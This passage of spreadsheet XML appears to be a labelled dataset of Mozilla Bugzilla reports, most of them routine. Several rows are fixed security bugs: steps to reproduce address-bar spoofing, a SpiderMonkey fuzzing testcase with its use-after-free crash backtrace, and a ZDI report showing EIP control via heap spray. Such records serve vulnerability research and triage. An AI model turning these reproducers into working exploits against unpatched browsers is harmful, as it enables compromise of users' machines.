          <t>similar to treeheader, which indicates % of complete jobs, Push Health should have very same feature, otherwise you have to switch to treeheader for that info.</t>
        </is>
      </c>
      <c r="X1712" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1713">
      <c r="A1713" t="n">
        <v>1745595</v>
      </c>
      <c r="B1713" t="inlineStr">
        <is>
          <t>2021-12-11 09:03:49 -0800</t>
        </is>
      </c>
      <c r="C1713" t="inlineStr">
        <is>
          <t>Resize Popup Window Will Also Render Over the Address Bar leads to Address Bar Spoofing</t>
        </is>
      </c>
      <c r="D1713" t="inlineStr">
        <is>
          <t>2024-05-30 10:52:07 -0700</t>
        </is>
      </c>
      <c r="E1713" t="n">
        <v>1</v>
      </c>
      <c r="F1713" t="n">
        <v>1</v>
      </c>
      <c r="G1713" t="n">
        <v>3</v>
      </c>
      <c r="H1713" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1713" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1713" t="inlineStr">
        <is>
          <t>Widget: Gtk</t>
        </is>
      </c>
      <c r="K1713" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1713" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1713" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1713" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1713" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1713" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main102+][adv-esr91.11+]</t>
        </is>
      </c>
      <c r="Q1713" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1713" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S1713" t="inlineStr">
        <is>
          <t>103 Branch</t>
        </is>
      </c>
      <c r="T1713" t="n">
        <v>1</v>
      </c>
      <c r="U1713" t="n">
        <v>0</v>
      </c>
      <c r="V1713" t="n">
        <v>55</v>
      </c>
      <c r="W1713" t="inlineStr">
        <is>
          <t>Created attachment 9254908
spoof.bundle.html
After resize popup window using `window.sizeToContent()` on page with large margin top, surprisingly the address bar UI will pushed up and replaced with HTML5 page content, therefore it possible to spoof the address bar.
I can only reproduce this on Linux (X11 and Wayland) and WebRender enabled. But I couldn't reproduce this on WebRender (Software) or `gfx.webrender.software` set to `true`.
## Tested on:
- Firefox Nightly 97.0a1 (2021-12-11) (64-bit) using Arch Linux KDE (X11 and Wayland) on Intel i5-1035G1 (1920x1080 DPI 125% and DPI 100%)
- Firefox Nightly 97.0a1 (2021-12-11) (64-bit) using Arch Linux KDE (X11) on AMD Ryzen PRO 4650G (2560x1440 DPI 125%)
- Firefox ESR 91.4.0esr (64-bit) using Arch Linux KDE (X11) on AMD Ryzen PRO 4650G (2560x1440 DPI 125%)
## Steps to reproduce:
1. Visit attached spoof.bundle.html
2. Click "1920x1080" or "2560x1440"
3. Address bar is now spoofed with HTML5 page content
(Try to increase the `marginTop` on the testcase if Firefox popup address bar UI still appear on your display.)</t>
        </is>
      </c>
      <c r="X1713" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1714">
      <c r="A1714" t="n">
        <v>1207571</v>
      </c>
      <c r="B1714" t="inlineStr">
        <is>
          <t>2015-09-23 06:03:06 -0700</t>
        </is>
      </c>
      <c r="C1714" t="inlineStr">
        <is>
          <t>Crash [@ js::DispatchValueTyped] or Crash [@ js::gc::TenuredCell::zone] with asm.js</t>
        </is>
      </c>
      <c r="D1714" t="inlineStr">
        <is>
          <t>2016-07-02 11:32:53 -0700</t>
        </is>
      </c>
      <c r="E1714" t="n">
        <v>1</v>
      </c>
      <c r="F1714" t="n">
        <v>1</v>
      </c>
      <c r="G1714" t="n">
        <v>3</v>
      </c>
      <c r="H1714" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1714" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1714" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1714" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1714" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1714" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1714" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1714" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1714" t="inlineStr">
        <is>
          <t>[jsbugmon:update,reconfirm,ignore][adv-main43+]</t>
        </is>
      </c>
      <c r="Q1714" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1714" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1714" t="inlineStr">
        <is>
          <t>mozilla45</t>
        </is>
      </c>
      <c r="T1714" t="n">
        <v>1</v>
      </c>
      <c r="U1714" t="n">
        <v>0</v>
      </c>
      <c r="V1714" t="n">
        <v>31</v>
      </c>
      <c r="W1714" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 2235e56c94cf (build with --enable-optimize --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --disable-debug, run with --fuzzing-safe --thread-count=2):
var lfcode = new Array();
lfcode.push = loadFile;
lfcode.push('');
lfcode.push('');
lfcode.push('');
lfcode.push('');
lfcode.push('0');
lfcode.push(`
function Function(stdlib)
{
  "use asm";
  var abs = stdlib.Math.abs;
  function f(p)
  {
    p = p|0;
  }
  return f;
}
`);
lfcode.push('');
lfcode.push('2');
lfcode.push('');
lfcode.push('');
lfcode.push('');
lfcode.push('4');
lfcode.push("gczeal(14, 1);");
lfcode.push('2');
lfcode.push('');
function loadFile(lfVarx) {
    try {
        if (lfVarx.substr(-3) != ".js" &amp;&amp; lfVarx.length != 1) {
            switch (lfRunTypeId) {
                case 0: evaluate(lfVarx); break;
                case 2: new Function(lfVarx)(); break;
                case 4: eval("(function() { " + lfVarx + " })();"); break;
            }
        } else if (!isNaN(lfVarx)) {
            lfRunTypeId = parseInt(lfVarx);
        }
    } catch (lfVare) {
    }
}
Backtrace:
Program received signal SIGSEGV, Segmentation fault.
js::DispatchValueTyped&lt;DoMarkingFunctor&lt;JS::Value&gt;, js::GCMarker*&amp;&gt;(DoMarkingFunctor&lt;JS::Value&gt;, JS::Value const&amp;, (decltype ({parm#1}((JSObject*)((decltype(nullptr))0), (Forward&lt;js::GCMarker*&amp;&gt;)({parm#3})))&amp;&amp;)...) (f=..., val=...) at ../../dist/include/js/Value.h:1841
#0  js::DispatchValueTyped&lt;DoMarkingFunctor&lt;JS::Value&gt;, js::GCMarker*&amp;&gt;(DoMarkingFunctor&lt;JS::Value&gt;, JS::Value const&amp;, (decltype ({parm#1}((JSObject*)((decltype(nullptr))0), (Forward&lt;js::GCMarker*&amp;&gt;)({parm#3})))&amp;&amp;)...) (f=..., val=...) at ../../dist/include/js/Value.h:1841
#1  0x00000000006e78f0 in DoMarking&lt;JS::Value&gt; (val=..., gcmarker=0x7ffff693e040) at js/src/gc/Marking.cpp:759
#2  DispatchToTracer&lt;JS::Value&gt; (trc=&lt;optimized out&gt;, thingp=0x7fffffffc890, name=&lt;optimized out&gt;) at js/src/gc/Marking.cpp:610
#3  0x00000000006e7b65 in js::TraceRootRange&lt;JS::Value&gt; (trc=trc@entry=0x7ffff693e040, len=4, vec=&lt;optimized out&gt;, name=0xba15cc "fp argv") at js/src/gc/Marking.cpp:497
#4  0x00000000006126ad in js::InterpreterFrame::markValues (this=this@entry=0x7ffff47ea0c8, trc=trc@entry=0x7ffff693e040, sp=&lt;optimized out&gt;, pc=&lt;optimized out&gt;) at js/src/vm/Stack.cpp:391
#5  0x000000000061622c in MarkInterpreterActivation (act=0x7fffffffc2d0, trc=0x7ffff693e040) at js/src/vm/Stack.cpp:400
#6  js::MarkInterpreterActivations (rt=&lt;optimized out&gt;, trc=trc@entry=0x7ffff693e040) at js/src/vm/Stack.cpp:411
#7  0x00000000006d18b3 in js::gc::GCRuntime::markRuntime (this=this@entry=0x7ffff693c3f0, trc=trc@entry=0x7ffff693e040, traceOrMark=traceOrMark@entry=js::gc::GCRuntime::MarkRuntime) at js/src/gc/RootMarking.cpp:314
#8  0x000000000090ee7f in js::gc::GCRuntime::beginMarkPhase (this=this@entry=0x7ffff693c3f0, reason=reason@entry=JS::gcreason::DEBUG_GC) at js/src/jsgc.cpp:3951
#9  0x00000000009345f1 in js::gc::GCRuntime::incrementalCollectSlice (this=this@entry=0x7ffff693c3f0, budget=..., reason=reason@entry=JS::gcreason::DEBUG_GC) at js/src/jsgc.cpp:5892
#10 0x000000000093529d in js::gc::GCRuntime::gcCycle (this=this@entry=0x7ffff693c3f0, nonincrementalByAPI=nonincrementalByAPI@entry=true, budget=..., reason=reason@entry=JS::gcreason::DEBUG_GC) at js/src/jsgc.cpp:6166
#11 0x000000000093561c in js::gc::GCRuntime::collect (this=this@entry=0x7ffff693c3f0, nonincrementalByAPI=nonincrementalByAPI@entry=true, budget=..., reason=reason@entry=JS::gcreason::DEBUG_GC) at js/src/jsgc.cpp:6282
#12 0x0000000000935991 in js::gc::GCRuntime::gc (this=0x7ffff693c3f0, gckind=&lt;optimized out&gt;, reason=JS::gcreason::DEBUG_GC) at js/src/jsgc.cpp:6346
#13 0x000000000093708d in js::gc::GCRuntime::runDebugGC (this=this@entry=0x7ffff693c3f0) at js/src/jsgc.cpp:6785
#14 0x00000000005378ef in js::gc::GCRuntime::gcIfNeededPerAllocation (this=this@entry=0x7ffff693c3f0, cx=cx@entry=0x7ffff6907000) at js/src/gc/Allocator.cpp:28
#15 0x0000000000565470 in checkAllocatorState&lt;(js::AllowGC)1&gt; (kind=js::gc::FIRST, cx=0x7ffff6907000, this=0x7ffff693c3f0) at js/src/gc/Allocator.cpp:55
#16 js::Allocate&lt;JSObject, (js::AllowGC)1&gt; (cx=cx@entry=0x7ffff6907000, kind=kind@entry=js::gc::FIRST, nDynamicSlots=0, heap=heap@entry=js::gc::DefaultHeap, clasp=clasp@entry=0x17fc0e0 &lt;JSFunction::class_&gt;) at js/src/gc/Allocator.cpp:121
#17 0x00000000005a5ae7 in JSObject::create (cx=0x7ffff6907000, kind=js::gc::FIRST, heap=js::gc::DefaultHeap, shape=..., group=...) at js/src/jsobjinlines.h:329
#18 0x00000000009057c6 in NewObject (cx=cx@entry=0x7ffff6907000, group=group@entry=..., kind=kind@entry=js::gc::FIRST, newKind=newKind@entry=js::GenericObject, initialShapeFlags=initialShapeFlags@entry=0) at js/src/jsobj.cpp:684
#19 0x0000000000906b85 in js::NewObjectWithClassProtoCommon (cxArg=cxArg@entry=0x7ffff6907000, clasp=clasp@entry=0x17fc0e0 &lt;JSFunction::class_&gt;, protoArg=protoArg@entry=..., allocKind=allocKind@entry=js::gc::FIRST, newKind=js::GenericObject) at js/src/jsobj.cpp:812
#20 0x000000000093107d in NewObjectWithClassProto (newKind=&lt;optimized out&gt;, allocKind=js::gc::FIRST, proto=..., clasp=0x17fc0e0 &lt;JSFunction::class_&gt;, cx=0x7ffff6907000) at js/src/jsobjinlines.h:721
#21 NewFunctionClone (proto=..., allocKind=js::gc::FIRST, newKind=(unknown: 4294949072), fun=..., cx=0x7ffff6907000) at js/src/jsfun.cpp:2080
#22 js::CloneFunctionReuseScript (cx=cx@entry=0x7ffff6907000, fun=..., fun@entry=..., parent=parent@entry=..., allocKind=allocKind@entry=js::gc::FIRST, newKind=newKind@entry=js::GenericObject, proto=..., proto@entry=...) at js/src/jsfun.cpp:2115
#23 0x00000000005fe857 in js::CloneFunctionObjectIfNotSingleton (cx=0x7ffff6907000, fun=..., parent=..., proto=proto@entry=..., newKind=newKind@entry=js::GenericObject) at js/src/jsfuninlines.h:90
#24 0x00000000005d73b3 in js::Lambda (cx=&lt;optimized out&gt;, fun=..., parent=...) at js/src/vm/Interpreter.cpp:4278
#25 0x00000000005db9b9 in Interpret (cx=0x7ffff6907000, state=...) at js/src/vm/Interpreter.cpp:3524
#26 0x00000000005e64bd in js::RunScript (cx=cx@entry=0x7ffff6907000, state=...) at js/src/vm/Interpreter.cpp:706
#27 0x00000000005e6d91 in js::Invoke (cx=cx@entry=0x7ffff6907000, args=..., construct=&lt;optimized out&gt;) at js/src/vm/Interpreter.cpp:783
#28 0x00000000005081ea in HandleDynamicLinkFailure (name=..., module=..., args=..., cx=0x7ffff6907000) at js/src/asmjs/AsmJSLink.cpp:886
#29 LinkAsmJS (cx=0x7ffff6907000, argc=&lt;optimized out&gt;, vp=&lt;optimized out&gt;) at js/src/asmjs/AsmJSLink.cpp:1053
#30 0x00007ffff7ff3c9c in ?? ()
#31 0x00007fffffffc918 in ?? ()
#32 0x00007fffffffc850 in ?? ()
#33 0x0000000000000000 in ?? ()
rax	0x4949494949494949	5280832617179597129
rbx	0x7ffff7e7d380	140737352553344
rcx	0xfa70	64112
rdx	0x7ffff6974730	140737330497328
rsi	0x1000000000000	281474976710656
rdi	0x0	0
rbp	0x7ffff693e040	140737330274368
rsp	0x7fffffffb060	140737488334944
r8	0x1	1
r9	0x0	0
r10	0x56029e99	1443012249
r11	0x7	7
r12	0x7ffff693e040	140737330274368
r13	0xfffb800000000000	-1266637395197952
r14	0x4	4
r15	0xfffa7fffffffffff	-1548112371908609
rip	0x6ddb10 &lt;js::DispatchValueTyped&lt;DoMarkingFunctor&lt;JS::Value&gt;, js::GCMarker*&amp;&gt;(DoMarkingFunctor&lt;JS::Value&gt;, JS::Value const&amp;, (decltype ({parm#1}((JSObject*)((decltype(nullptr))0), (Forward&lt;js::GCMarker*&amp;&gt;)({parm#3})))&amp;&amp;)...)+176&gt;
=&gt; 0x6ddb10 &lt;js::DispatchValueTyped&lt;DoMarkingFunctor&lt;JS::Value&gt;, js::GCMarker*&amp;&gt;(DoMarkingFunctor&lt;JS::Value&gt;, JS::Value const&amp;, (decltype ({parm#1}((JSObject*)((decltype(nullptr))0), (Forward&lt;js::GCMarker*&amp;&gt;)({parm#3})))&amp;&amp;)...)+176&gt;:	mov    0x10(%rax),%rax
   0x6ddb14 &lt;js::DispatchValueTyped&lt;DoMarkingFunctor&lt;JS::Value&gt;, js::GCMarker*&amp;&gt;(DoMarkingFunctor&lt;JS::Value&gt;, JS::Value const&amp;, (decltype ({parm#1}((JSObject*)((decltype(nullptr))0), (Forward&lt;js::GCMarker*&amp;&gt;)({parm#3})))&amp;&amp;)...)+180&gt;:	movb   $0x1,0x291(%rax)
Assuming sec-critical because of the crash pattern in register rax and GC being involved. Likely use-after-free.</t>
        </is>
      </c>
      <c r="X1714" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1715">
      <c r="A1715" t="n">
        <v>373373</v>
      </c>
      <c r="B1715" t="inlineStr">
        <is>
          <t>2007-03-09 11:25:55 -0800</t>
        </is>
      </c>
      <c r="C1715" t="inlineStr">
        <is>
          <t>Provide Talkback extension drop to community builds</t>
        </is>
      </c>
      <c r="D1715" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E1715" t="n">
        <v>1</v>
      </c>
      <c r="F1715" t="n">
        <v>1</v>
      </c>
      <c r="G1715" t="n">
        <v>5</v>
      </c>
      <c r="H1715" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1715" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1715" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1715" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1715" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1715" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1715" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1715" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1715" t="inlineStr"/>
      <c r="Q1715" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1715" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1715" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1715" t="n">
        <v>1</v>
      </c>
      <c r="U1715" t="n">
        <v>0</v>
      </c>
      <c r="V1715" t="n">
        <v>39</v>
      </c>
      <c r="W1715" t="inlineStr">
        <is>
          <t>The calbld user was added as part of bug 369013 to facilitate community tinderbox builds of Calendar products. Unfortunately, Sunbird builds Talkback which is pulled from the internal mofo CVS repository. I'm not sure how we want to handle access in this situation, given that the calbld key will be in the hands of community members rather than MoCo employees.
What's feasible here?
* grant calbld read-only access to only the talkback section on the mofo/ repo (not sure this is even possible);
* move the talkback code to a new distinct repo with access for only the build users
Other ideas? I've talked to lilmatt about this already. The Sunbird team is actually moving away from trunk builds to branch-only builds to insulate themselves from that churn, so moving to Breakpad isn't really an option.</t>
        </is>
      </c>
      <c r="X1715" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1716">
      <c r="A1716" t="n">
        <v>794794</v>
      </c>
      <c r="B1716" t="inlineStr">
        <is>
          <t>2012-09-27 02:44:27 -0700</t>
        </is>
      </c>
      <c r="C1716" t="inlineStr">
        <is>
          <t>Scrolling in zoom options with left/right arrow keys also changes page</t>
        </is>
      </c>
      <c r="D1716" t="inlineStr">
        <is>
          <t>2013-02-06 04:35:30 -0800</t>
        </is>
      </c>
      <c r="E1716" t="n">
        <v>1</v>
      </c>
      <c r="F1716" t="n">
        <v>1</v>
      </c>
      <c r="G1716" t="n">
        <v>2</v>
      </c>
      <c r="H1716" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1716" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1716" t="inlineStr">
        <is>
          <t>PDF Viewer</t>
        </is>
      </c>
      <c r="K1716" t="inlineStr">
        <is>
          <t>18 Branch</t>
        </is>
      </c>
      <c r="L1716" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1716" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N1716" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1716" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1716" t="inlineStr">
        <is>
          <t>[pdfjs-c-ux][pdfjs-f-fixed-upstream]https://github.com/mozilla/pdf.js/pull/2180</t>
        </is>
      </c>
      <c r="Q1716" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1716" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1716" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1716" t="n">
        <v>1</v>
      </c>
      <c r="U1716" t="n">
        <v>0</v>
      </c>
      <c r="V1716" t="n">
        <v>2</v>
      </c>
      <c r="W1716" t="inlineStr">
        <is>
          <t>1.Click the zoom menu
2.Press enter to select a mode
3.Press the left or right arrow key
Both the zoom option alternative and the page will change. Either left/right shouldn't work in the menu (down/up does the same thing), or it shouldn't change page when the zoom menu is in focus.</t>
        </is>
      </c>
      <c r="X1716" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1717">
      <c r="A1717" t="n">
        <v>51300</v>
      </c>
      <c r="B1717" t="inlineStr">
        <is>
          <t>2000-09-04 11:13:24 -0700</t>
        </is>
      </c>
      <c r="C1717" t="inlineStr">
        <is>
          <t>importxml.pl, move.pl send mail using -ODeliveryMode=background</t>
        </is>
      </c>
      <c r="D1717" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:22 -0800</t>
        </is>
      </c>
      <c r="E1717" t="n">
        <v>1</v>
      </c>
      <c r="F1717" t="n">
        <v>1</v>
      </c>
      <c r="G1717" t="n">
        <v>4</v>
      </c>
      <c r="H1717" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1717" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1717" t="inlineStr">
        <is>
          <t>Bug Import/Export &amp; Moving</t>
        </is>
      </c>
      <c r="K1717" t="inlineStr">
        <is>
          <t>2.13</t>
        </is>
      </c>
      <c r="L1717" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1717" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1717" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1717" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1717" t="inlineStr">
        <is>
          <t>MTAConfig</t>
        </is>
      </c>
      <c r="Q1717" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1717" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1717" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T1717" t="n">
        <v>1</v>
      </c>
      <c r="U1717" t="n">
        <v>0</v>
      </c>
      <c r="V1717" t="n">
        <v>8</v>
      </c>
      <c r="W1717" t="inlineStr">
        <is>
          <t>I remember reading somewhere else that the mozilla.org folks thought it was a 
Bad Thing to do background emailing...
In both importxml.pl and move.pl (the bug move code) calls to sendmail are being 
made with -ODeliveryMode=background.  Should this be changed to use the new 
'sendmailnow' param?  Or should it just send the mail directly?</t>
        </is>
      </c>
      <c r="X1717" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1718">
      <c r="A1718" t="n">
        <v>1409948</v>
      </c>
      <c r="B1718" t="inlineStr">
        <is>
          <t>2017-10-18 19:39:17 -0700</t>
        </is>
      </c>
      <c r="C1718" t="inlineStr">
        <is>
          <t>The emptySync asset has the old Firefox logo</t>
        </is>
      </c>
      <c r="D1718" t="inlineStr">
        <is>
          <t>2017-10-24 05:54:28 -0700</t>
        </is>
      </c>
      <c r="E1718" t="n">
        <v>1</v>
      </c>
      <c r="F1718" t="n">
        <v>1</v>
      </c>
      <c r="G1718" t="n">
        <v>2</v>
      </c>
      <c r="H1718" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1718" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J1718" t="inlineStr">
        <is>
          <t>Browser</t>
        </is>
      </c>
      <c r="K1718" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1718" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M1718" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N1718" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1718" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1718" t="inlineStr"/>
      <c r="Q1718" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1718" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1718" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1718" t="n">
        <v>1</v>
      </c>
      <c r="U1718" t="n">
        <v>0</v>
      </c>
      <c r="V1718" t="n">
        <v>6</v>
      </c>
      <c r="W1718" t="inlineStr">
        <is>
          <t>This asset 
https://github.com/mozilla-mobile/firefox-ios/blob/master/Client/Frontend/Home/Home.xcassets/emptySync.imageset/sync-devices@3x.png
needs to be updated to the new fx logo.</t>
        </is>
      </c>
      <c r="X1718" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1719">
      <c r="A1719" t="n">
        <v>739343</v>
      </c>
      <c r="B1719" t="inlineStr">
        <is>
          <t>2012-03-26 12:38:27 -0700</t>
        </is>
      </c>
      <c r="C1719" t="inlineStr">
        <is>
          <t>Use After Free in nsHTMLSelectElement (ZDI-CAN-1301)</t>
        </is>
      </c>
      <c r="D1719" t="inlineStr">
        <is>
          <t>2012-06-15 11:06:36 -0700</t>
        </is>
      </c>
      <c r="E1719" t="n">
        <v>1</v>
      </c>
      <c r="F1719" t="n">
        <v>1</v>
      </c>
      <c r="G1719" t="n">
        <v>3</v>
      </c>
      <c r="H1719" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1719" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1719" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1719" t="inlineStr">
        <is>
          <t>2.0 Branch</t>
        </is>
      </c>
      <c r="L1719" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1719" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N1719" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1719" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1719" t="inlineStr">
        <is>
          <t>[sg:critical] fixed by bug 335998</t>
        </is>
      </c>
      <c r="Q1719" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1719" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1719" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1719" t="n">
        <v>1</v>
      </c>
      <c r="U1719" t="n">
        <v>0</v>
      </c>
      <c r="V1719" t="n">
        <v>9</v>
      </c>
      <c r="W1719" t="inlineStr">
        <is>
          <t>ZDI-CAN-1301: Mozilla Firefox nsHTMLSelectElement Remote Code
Execution Vulnerability
-- CVSS -----------------------------------------
7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P
-- ABSTRACT -------------------------------------
TippingPoint has identified a vulnerability affecting the following
products:
  Mozilla Firefox
-- VULNERABILITY DETAILS ------------------------
Version(s)  tested: Mozilla Firefox v4.0
Platform(s) tested: XP SP3
Object is used after free. A vtable pointer within the object is
referenced at 1043781c (mov eax, dword ptr [edx+44h]) and the value
fetched from the table is jumped to at 1043781f (call eax).
Code surrounding vulnerability:
10437812 7408 je xul!nsINode::ReplaceOrInsertBefore+0x39820c (1043781c)
10437814 8b4250 mov eax,dword ptr [edx+50h]
10437817 53 push ebx
10437818 ffd0 call eax
1043781a eb05 jmp xul!nsINode::ReplaceOrInsertBefore+0x398211 (10437821)
1043781c 8b4244 mov eax,dword ptr [edx+44h] ds:0023:41414185=????????
 //vulnerable deref
1043781f ffd0 call eax //call to vulnerable deref
With heap spray, EIP is controlled:
(374.518): Access violation - code c0000005 (!!! second chance !!!)
eax=0c0c0c0c ebx=00000000 ecx=0426a600 edx=0c0c0c0c esi=0426a600
edi=043e1940
eip=0c0c0c0c esp=0012cbb0 ebp=00000001 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246
0c0c0c0c 0c0c or al,0Ch
0:000&gt; k
ChildEBP RetAddr
WARNING: Frame IP not in any known module. Following frames may be wrong.
0012cbac 10437821 0xc0c0c0c
0012cbdc 1010ca1a xul!nsINode::ReplaceOrInsertBefore+0x398211
0012cc48 1055eb86 xul!nsCOMPtr_base::assign_from_qi+0x2a
[e:\builds\moz2_slave\rel-2.0-w32-bld\build\obj-firefox\xpcom\build\nscomptr.cpp
98]
0012cc50 1057a744
xul!nsCOMPtr&lt;nsIDOMHTMLOptionElement&gt;::nsCOMPtr&lt;nsIDOMHTMLOptionElement&gt;+0x18
[e:\builds\moz2_slave\rel-2.0-w32-bld\build\obj-firefox\dist\include\nscomptr.h
596]
0012cc74 10962eb5 xul!nsHTMLOptionCollection::Add+0x8c
[e:\builds\moz2_slave\rel-2.0-w32-bld\build\content\html\content\src\nshtmlselectelement.cpp
2286]
0012ccac 00535221 xul!nsIDOMNSHTMLOptionCollection_Add+0xf2
[e:\builds\moz2_slave\rel-2.0-w32-bld\build\obj-firefox\js\src\xpconnect\src\dom_quickstubs.cpp
20899]
0012d288 0052cb31 mozjs!js::Interpret+0x6331
[e:\builds\moz2_slave\rel-2.0-w32-bld\build\js\src\jsinterp.cpp 4801]
0012d2bc 0052cf51 mozjs!js::RunScript+0xb1
[e:\builds\moz2_slave\rel-2.0-w32-bld\build\js\src\jsinterp.cpp 653]
0012d314 0052d72c mozjs!js::Invoke+0x3b1
[e:\builds\moz2_slave\rel-2.0-w32-bld\build\js\src\jsinterp.cpp 740]
0012d350 004ed4cf mozjs!js::ExternalInvoke+0x1dc
[e:\builds\moz2_slave\rel-2.0-w32-bld\build\js\src\jsinterp.cpp 863]
0012d384 10176229 mozjs!JS_CallFunctionValue+0x4f
[e:\builds\moz2_slave\rel-2.0-w32-bld\build\js\src\jsapi.cpp 5174]
0012d44c 10192a2b xul!nsJSContext::CallEventHandler+0x2b9
[e:\builds\moz2_slave\rel-2.0-w32-bld\build\dom\base\nsjsenvironment.cpp
1915]
0012d548 101a4ca2 xul!nsJSEventListener::HandleEvent+0x11b
[e:\builds\moz2_slave\rel-2.0-w32-bld\build\dom\src\events\nsjseventlistener.cpp
230]
0012d634 1013acbe xul!nsEventListenerManager::HandleEventSubType+0x36
[e:\builds\moz2_slave\rel-2.0-w32-bld\build\content\events\src\nseventlistenermanager.cpp
1127]
0012d688 10125c72
xul!nsEventListenerManager::HandleEventInternal+0x2ce
[e:\builds\moz2_slave\rel-2.0-w32-bld\build\content\events\src\nseventlistenermanager.cpp
1224]
0012d6d4 1010ad14
xul!nsEventTargetChainItem::HandleEventTargetChain+0x2d2
